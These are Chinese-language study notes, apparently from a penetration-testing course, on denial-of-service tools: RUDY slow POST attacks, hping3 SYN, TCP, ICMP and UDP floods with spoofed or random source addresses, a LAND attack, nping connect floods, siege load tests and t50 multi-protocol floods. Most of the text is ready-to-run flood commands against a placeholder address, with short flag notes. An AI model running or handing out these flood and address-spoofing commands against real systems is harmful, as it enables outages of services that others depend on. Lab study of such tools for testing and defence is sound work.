● 慢速应用层HTTP POST攻击,与slowhttptest原理相同
● 每次只传输一个字节的数据
● 美剧“黑客军团”中曾提到此攻击手段
● 攻击又表单WEB页面,攻击时需指定攻击的参数名称
[https://sourceforge.net/projects/r-u-dead-yet/]
从上面的网站进行下载,解压即可
● 如上图,修改一下rudeadyet.conf
修改一个你要攻击的URL,attack_parameter后面跟着你要攻击的表单名
DVWA无法访问
● 几乎可以定制发送任何TCP/IP数据包,用于测试FW、端口扫描、性能测试
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1
hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1
hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 (TCP Flood)
-d 发送多大的数据包
hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2
-a 伪造源地址
hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2
● 特殊种类的SYN Flood攻击
● 源地址、目的地址都是受害者,受害者与自己完成三次握手
hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1
nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1
nping --echo-client "public" echo.nmap.org --udp #查询公网IP
● http/https压力测试工具,模拟多个用户并发访问请求
siege -g http://1.1.1.1/a.php / 1.1.1.1
#通过get方式去请求网站
siege -i -c 1000 http://1.1.1.1/a.php -A siegehttp
# -A 后面是http头字符
● 同时攻击多个url,使用-f调用字典文件
● /etc/siege/urls.txt
t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22